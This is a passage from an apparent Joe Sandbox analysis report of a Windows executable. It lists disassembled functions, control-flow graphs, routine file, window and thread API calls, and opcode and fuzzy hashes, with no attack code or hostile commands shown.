                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0028F524
                                        • SHGetMalloc.SHELL32(002C532C), ref: 0028F52E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                        • String ID: riched20.dll$3Ro
                                        • API String ID: 2446841611-3613677438
                                        • Opcode ID: 1a002fa5d4f2135b6c3fe69cd8980b5d2d9d72212f7ed55d07560830997f55dd
                                        • Instruction ID: 0375b7904521396cf85161f5c0da45543c9b2ff8fbbef70472741ea043f865ac
                                        • Opcode Fuzzy Hash: 1a002fa5d4f2135b6c3fe69cd8980b5d2d9d72212f7ed55d07560830997f55dd
                                        • Instruction Fuzzy Hash: 2FF0F9B5D00219ABCB10AF99DC4DDEEFBFCEF95700F00405AE415E2251DBB856558FA1
                                        Function 0027E180 Relevance: 7.7, APIs: 5, Instructions: 183filetimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1168 27e180-27e1c9 1169 27e1d4 1168->1169 1170 27e1cb-27e1ce 1168->1170 1172 27e1d6-27e1e6 1169->1172 1170->1169 1171 27e1d0-27e1d2 1170->1171 1171->1172 1173 27e1ee-27e1f8 1172->1173 1174 27e1e8 1172->1174 1175 27e1fd-27e22a 1173->1175 1176 27e1fa 1173->1176 1174->1173 1177 27e232-27e238 1175->1177 1178 27e22c 1175->1178 1176->1175 1179 27e23c-27e254 CreateFileW 1177->1179 1180 27e23a 1177->1180 1178->1177 1181 27e316 1179->1181 1182 27e25a-27e28a GetLastError call 28169a 1179->1182 1180->1179 1184 27e319-27e31c 1181->1184 1188 27e2be 1182->1188 1189 27e28c-27e293 1182->1189 1186 27e31e-27e321 1184->1186 1187 27e32a-27e32e 1184->1187 1186->1187 1190 27e323 1186->1190 1191 27e330-27e333 1187->1191 1192 27e34f-27e360 1187->1192 1196 27e2c1-27e2cb 1188->1196 1193 27e295 1189->1193 1194 27e298-27e2b8 CreateFileW GetLastError 1189->1194 1190->1187 1191->1192 1195 27e335-27e34c SetFileTime 1191->1195 1197 27e374-27e39a call 271a66 call 295734 1192->1197 1198 27e362-27e370 call 2725c3 1192->1198 1193->1194 1194->1188 1199 27e2ba-27e2bc 1194->1199 1195->1192 1200 27e300-27e314 1196->1200 1201 27e2cd-27e2e2 1196->1201 1198->1197 1199->1196 1200->1184 1205 27e2f7-27e2ff call 295726 1201->1205 1206 27e2e4-27e2f4 call 2719a9 1201->1206 1205->1200 1206->1205
                                        APIs
                                        • CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,D946AC94,?,?,00000000,?,?,00000000,002A9E6B,000000FF), ref: 0027E248
                                        • GetLastError.KERNEL32(?,?,00000000,002A9E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 0027E25A
                                        • CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,002A9E6B,000000FF,?,00000011), ref: 0027E2A6
                                        • GetLastError.KERNEL32(?,?,00000000,002A9E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 0027E2AF
                                        • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,002A9E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 0027E346
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: File$CreateErrorLast$Time
                                        • String ID:
                                        • API String ID: 1999340476-0
                                        • Opcode ID: de99ae3af585e7b011a7c121cfb6741e91989f08fa6485b2dfc47f5400b5942d
                                        • Instruction ID: 4d7a511a0a21f833c346f955f2b862930bc3c5eea5af6708a22999c80ada42d5
                                        • Opcode Fuzzy Hash: de99ae3af585e7b011a7c121cfb6741e91989f08fa6485b2dfc47f5400b5942d
                                        • Instruction Fuzzy Hash: B261AE7092024ADFDF24CF64D885BEE7BA8FF09314F208259F91997281D7749964CBA4
                                        Function 002874EC Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1214 2874ec-287536 call 2877cf ReleaseSemaphore 1217 287538 1214->1217 1218 287556-28758a DeleteCriticalSection CloseHandle * 2 1214->1218 1219 28753b-287554 call 2875ed CloseHandle 1217->1219 1219->1218
                                        APIs
                                          • Part of subcall function 002877CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,002773B8), ref: 002877E1
                                          • Part of subcall function 002877CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,002773B8), ref: 002877F5
                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000,D946AC94,?,?,00000001,00000000,002AA603,000000FF,?,002890B9,?,?,00275630,?), ref: 0028752A
                                        • CloseHandle.KERNELBASE(?,?,?,002890B9,?,?,00275630,?,?,?,00000000,?,?,?,00000001,?), ref: 00287544
                                        • DeleteCriticalSection.KERNEL32(?,?,002890B9,?,?,00275630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 0028755D
                                        • CloseHandle.KERNEL32(?,?,002890B9,?,?,00275630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00287569
                                        • CloseHandle.KERNEL32(?,?,002890B9,?,?,00275630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00287575
                                          • Part of subcall function 002875ED: WaitForSingleObject.KERNEL32(?,000000FF,0028770A,?,?,0028777F,?,?,?,?,?,00287769), ref: 002875F3
                                          • Part of subcall function 002875ED: GetLastError.KERNEL32(?,?,0028777F,?,?,?,?,?,00287769), ref: 002875FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                        • String ID:
                                        • API String ID: 1868215902-0
                                        • Opcode ID: c4e778bf1df741b0f28b74f4f6798cc6280efa50d943e4860bb012e2e229ae2a
                                        • Instruction ID: 876223270e4699ecbff15e090722147ef183f9e99e4f3f5b91bd7a364f70fa02
                                        • Opcode Fuzzy Hash: c4e778bf1df741b0f28b74f4f6798cc6280efa50d943e4860bb012e2e229ae2a
                                        • Instruction Fuzzy Hash: 9511C476004704EFD7229F64EC88FC6FBA9FB09710F50492AF556921A0CF75A954CB50
                                        Function 00290678 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1222 290678-290691 PeekMessageW 1223 2906cc-2906ce 1222->1223 1224 290693-2906a7 GetMessageW 1222->1224 1225 2906a9-2906b6 IsDialogMessageW 1224->1225 1226 2906b8-2906c6 TranslateMessage DispatchMessageW 1224->1226 1225->1223 1225->1226 1226->1223
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00290689
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0029069A
                                        • IsDialogMessageW.USER32(00010414,?), ref: 002906AE
                                        • TranslateMessage.USER32(?), ref: 002906BC
                                        • DispatchMessageW.USER32(?), ref: 002906C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 1266772231-0
                                        • Opcode ID: 9048cc592297e034cd0b6ccc45c3ec0680426f35635f16a729397c372eb6c7cd
                                        • Instruction ID: 332bb2e08735ea4d7479f807eb33b9f7d3cc5e0c37b63f023b18d925442f55ac
                                        • Opcode Fuzzy Hash: 9048cc592297e034cd0b6ccc45c3ec0680426f35635f16a729397c372eb6c7cd
                                        • Instruction Fuzzy Hash: E9F0D0B191622EAB8F20AFE2EC4CDDB7FBCEE452517404415F516D2050E724D515CBB0
                                        Function 00292813 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1227 292813-292845 call 277673 1230 29284a-292850 1227->1230 1231 292847 1227->1231 1232 292abd 1230->1232 1233 292856-29285b 1230->1233 1231->1230 1236 292abf-292ac3 1232->1236 1234 29285d 1233->1234 1235 292860-29286e 1233->1235 1234->1235 1237 292870-29287c 1235->1237 1238 292896 1235->1238 1239 292ace-292ad2 1236->1239 1240 292ac5-292ac8 1236->1240 1237->1238 1241 29287e 1237->1241 1242 292899-29289c 1238->1242 1244 292af7 1239->1244 1245 292ad4-292ad7 1239->1245 1243 292aca-292acc 1240->1243 1240->1244 1246 292884-292888 1241->1246 1247 2928a2-2928a7 1242->1247 1248 292ab7 1242->1248 1249 292ada-292af2 call 277673 call 2938a0 1243->1249 1252 2934ad-2934e9 call 2758cb 1244->1252 1245->1244 1250 292ad9 1245->1250 1253 29288e-292894 1246->1253 1254 2929f0-2929f2 1246->1254 1255 2928a9 1247->1255 1256 2928ac-2928d7 call 29acee call 271afc 1247->1256 1248->1232 1249->1244 1250->1249 1253->1238 1253->1246 1254->1238 1258 2929f8-2929fc 1254->1258 1255->1256 1256->1252 1266 2928dd-2928e1 1256->1266 1258->1242 1267 2928e3 1266->1267 1268 2928e5-2928ec 1266->1268 1267->1268 1269 2928ee 1268->1269 1270 2928f1-29292f call 27120c call 28645a 1268->1270 1269->1270 1275 292935-292937 1270->1275 1276 29293d-29299f call 2714a7 call 27adaa call 271a66 call 2714a7 call 27adaa call 271a66 1275->1276 1277 292a01-292a07 1275->1277 1306 2929a1-2929a3 1276->1306 1307 2929a4-2929d2 call 2714a7 call 27adaa call 271a66 1276->1307 1278 292a09-292a24 1277->1278 1279 292a4e-292a68 1277->1279 1281 292a45-292a4d call 295726 1278->1281 1282 292a26-292a3f call 2719a9 1278->1282 1284 292a6a-292a85 1279->1284 1285 292aaf-292ab5 1279->1285 1281->1279 1282->1281 1286 292a87-292aa0 call 2719a9 1284->1286 1287 292aa6-292aae call 295726 1284->1287 1285->1236 1286->1287 1287->1285 1306->1307 1314 2929d4-2929d6 1307->1314 1315 2929d7-2929eb call 28645a 1307->1315 1314->1315 1315->1275
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: HIDE$MAX$MIN
                                        • API String ID: 176396367-2426493550
                                        • Opcode ID: c238699ac1cd551dd50e44b6fc1578e1283379e062d495db0ba9075e562d3461
                                        • Instruction ID: 013f627ba6c628f71449971ecec4d25e91394d4326e4d5575970d8dd70b861c9
                                        • Opcode Fuzzy Hash: c238699ac1cd551dd50e44b6fc1578e1283379e062d495db0ba9075e562d3461
                                        • Instruction Fuzzy Hash: E1A16C72C20269DECF25DFA4CC84ADDB7B8BF49310F14419AD409B7241EB705A99CFA0
                                        Function 0028F2CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1318 28f2ce-28f2f7 GetClassNameW 1319 28f2f9-28f30e call 288da4 1318->1319 1320 28f31f-28f321 1318->1320 1326 28f31e 1319->1326 1327 28f310-28f31c FindWindowExW 1319->1327 1322 28f32c-28f338 call 295734 1320->1322 1323 28f323-28f326 SHAutoComplete 1320->1323 1323->1322 1326->1320 1327->1326
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000050), ref: 0028F2EF
                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 0028F326
                                          • Part of subcall function 00288DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00280E3F,?,?,?,00000046,00281ECE,00000046,?,exe,00000046), ref: 00288DBA
                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0028F316
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                        • String ID: EDIT
                                        • API String ID: 4243998846-3080729518
                                        • Opcode ID: 6b91ffeed531b17fd6f112580fce94398592b15b0482727190bf13884ff7d82b
                                        • Instruction ID: c15c61faa53842fb9629d355c396d0d08cdd9a57d69f1b3307dcef7a94770466
                                        • Opcode Fuzzy Hash: 6b91ffeed531b17fd6f112580fce94398592b15b0482727190bf13884ff7d82b
                                        • Instruction Fuzzy Hash: 4CF0C835711219ABDB20AF24AD09FDFB7AC9F45B10F000065BA01E71C1DA70AA558B65
                                        Function 0027E948 Relevance: 6.1, APIs: 4, Instructions: 117fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1329 27e948-27e961 call 2957d8 1332 27e963-27e965 1329->1332 1333 27e96a-27e974 1329->1333 1334 27eaa6-27eaab call 295787 1332->1334 1335 27e976-27e983 GetStdHandle 1333->1335 1336 27e988 1333->1336 1337 27ea6f-27ea72 1335->1337 1338 27e98b-27e998 1336->1338 1337->1338 1340 27e9df-27e9f4 WriteFile 1338->1340 1341 27e99a-27e99e 1338->1341 1345 27e9f7-27e9f9 1340->1345 1343 27e9a0-27e9ab 1341->1343 1344 27e9ff-27ea03 1341->1344 1348 27e9af-27e9ce WriteFile 1343->1348 1349 27e9ad 1343->1349 1346 27ea9f-27eaa2 1344->1346 1347 27ea09-27ea0d 1344->1347 1345->1344 1345->1346 1346->1334 1347->1346 1350 27ea13-27ea25 call 279230 1347->1350 1348->1345 1351 27e9d0-27e9db 1348->1351 1349->1348 1355 27ea77-27ea9a call 2714a7 call 279653 call 271a66 1350->1355 1356 27ea27-27ea30 1350->1356 1351->1343 1353 27e9dd 1351->1353 1353->1345 1355->1346 1356->1338 1358 27ea36-27ea3a 1356->1358 1358->1338 1360 27ea40-27ea6c 1358->1360 1360->1337
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027E94F
                                        • GetStdHandle.KERNEL32(000000F5,0000002C,00282D28,?,?,?,?,00000000,0028ABB6,?,?,?,?,?,0028A80E,?), ref: 0027E978
                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0027E9BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FileH_prolog3_HandleWrite
                                        • String ID:
                                        • API String ID: 2898186245-0
                                        • Opcode ID: 68d03a5d33ceaed458b416873a8b340b650fd84a76f5c0c857b707deb655710d
                                        • Instruction ID: 87a9b703edc29419c154351b77ecff180af283d4827267837706333a24629cae
                                        • Opcode Fuzzy Hash: 68d03a5d33ceaed458b416873a8b340b650fd84a76f5c0c857b707deb655710d
                                        • Instruction Fuzzy Hash: 9941D036A21215EBDF10DF64D884BED7B76BF89700F158158F905AB280CB709D64CBA1
                                        Function 0027EFEF Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1368 27efef-27f00a call 2957d8 call 2813da 1373 27f031-27f033 1368->1373 1374 27f00c-27f00f 1368->1374 1376 27f035-27f03d call 27ed0d 1373->1376 1374->1373 1375 27f011-27f017 1374->1375 1377 27f01b-27f029 CreateDirectoryW 1375->1377 1378 27f019 1375->1378 1385 27f0e3-27f0f0 GetLastError 1376->1385 1386 27f043-27f065 call 28169a 1376->1386 1380 27f0d0-27f0d4 1377->1380 1381 27f02f 1377->1381 1378->1377 1383 27f0d6-27f0da call 27f58b 1380->1383 1384 27f0df-27f0e1 1380->1384 1381->1376 1383->1384 1389 27f0fb-27f100 call 295787 1384->1389 1385->1389 1390 27f0f2-27f0fa 1385->1390 1393 27f067-27f06e 1386->1393 1394 27f07d-27f087 1386->1394 1390->1389 1396 27f073-27f07b CreateDirectoryW 1393->1396 1397 27f070 1393->1397 1398 27f0bc-27f0ce 1394->1398 1399 27f089-27f09e 1394->1399 1396->1394 1397->1396 1398->1380 1398->1385 1400 27f0b3-27f0bb call 295726 1399->1400 1401 27f0a0-27f0b0 call 2719a9 1399->1401 1400->1398 1401->1400
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027EFF6
                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,0027EBA7,?,00000001,00000000,?,?,00000024,0027A4DE,?,00000001,?,?), ref: 0027F01F
                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,0027EBA7,?,00000001,00000000,?,?,00000024,0027A4DE,?), ref: 0027F075
                                        • GetLastError.KERNEL32(?,?,00000024,0027EBA7,?,00000001,00000000,?,?,00000024,0027A4DE,?,00000001,?,?,00000000), ref: 0027F0E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$ErrorH_prolog3_Last
                                        • String ID:
                                        • API String ID: 3709856315-0
                                        • Opcode ID: 60649b2ef4940c288e2e2e6cc566f60ef02d3b0170107d42bd651dca0f82485f
                                        • Instruction ID: 13ab6bf2d6ae9a67272f05ade48e6232973dc5230c266a22119bfb5a349b29aa
                                        • Opcode Fuzzy Hash: 60649b2ef4940c288e2e2e6cc566f60ef02d3b0170107d42bd651dca0f82485f
                                        • Instruction Fuzzy Hash: 2731F771924209DBCF50DFE9CA88AEEBBF8AF48300F10842AE504E3351DB308951CB71
                                        Function 0027E019 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0027E5D2,?,?,00000000,?,00000000), ref: 0027E029
                                        • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,0027E5D2,?,?,00000000,?,00000000), ref: 0027E041
                                        • GetLastError.KERNEL32(?,?,?,00000000,0027E5D2,?,?,00000000,?,00000000), ref: 0027E073
                                        • GetLastError.KERNEL32(?,?,?,00000000,0027E5D2,?,?,00000000,?,00000000), ref: 0027E092
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileHandleRead
                                        • String ID:
                                        • API String ID: 2244327787-0
                                        • Opcode ID: ae96e5923cc7bdc94f59288872ef2bf1e9b605db4f0fe1ea43d86493ced6cd76
                                        • Instruction ID: 8e1c897fcb95180ca8285a890dc8b5e3b7e942921df693a3a5ecc3a03681b3ad
                                        • Opcode Fuzzy Hash: ae96e5923cc7bdc94f59288872ef2bf1e9b605db4f0fe1ea43d86493ced6cd76
                                        • Instruction Fuzzy Hash: 7C11C230520219EBDF305F60D908B6E37A9FB49324F22C6A9E42EE5190CBF19D649B75
                                        Function 0028FB4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0028FB52
                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?,00000000,002C535C), ref: 0028FC24
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FileH_prolog3_Operation_wcslen
                                        • String ID: \S,
                                        • API String ID: 3104323202-967404722
                                        • Opcode ID: 9c55ea40d7db535f1174191ce7cf6a3f0dd69d8e97b646612c586dbd366acc7c
                                        • Instruction ID: 2a1da45084926282336cde9cb03b63a11cb8685df4ed476756ff9067f041eeaf
                                        • Opcode Fuzzy Hash: 9c55ea40d7db535f1174191ce7cf6a3f0dd69d8e97b646612c586dbd366acc7c
                                        • Instruction Fuzzy Hash: FC314571D21358DADB11EFE8C986ADCBBB4BF18314F54012EE119A7292DB705AA5CF10
                                        Function 00287628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 0028764C
                                        • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,0027736D,00275AB0,?), ref: 00287693
                                          • Part of subcall function 002792EB: __EH_prolog3_GS.LIBCMT ref: 002792F2
                                          • Part of subcall function 00279500: __EH_prolog3_GS.LIBCMT ref: 00279507
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_Thread$CreatePriority
                                        • String ID: CreateThread failed
                                        • API String ID: 3138599208-3849766595
                                        • Opcode ID: 8abcd1f025290641b690c85436c5a9666a89812dcfc4c800628c5fac0efd3382
                                        • Instruction ID: 332362be060c4c77c34b61d6ce194de9fac3b4c903a309111f4be4cabb728ff8
                                        • Opcode Fuzzy Hash: 8abcd1f025290641b690c85436c5a9666a89812dcfc4c800628c5fac0efd3382
                                        • Instruction Fuzzy Hash: 8601F2752697167BE6107E68AC85FA2739CEB42750F300529F94AA2181DAB1A8648728
                                        Function 00293C78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 00293C82
                                        • _wcslen.LIBCMT ref: 00293C99
                                          • Part of subcall function 00286A89: _wcslen.LIBCMT ref: 00286AA6
                                          • Part of subcall function 0027B03D: __EH_prolog3_GS.LIBCMT ref: 0027B044
                                          • Part of subcall function 0027B3E1: __EH_prolog3_GS.LIBCMT ref: 0027B3E8
                                        Strings
                                        Memory Dump Source
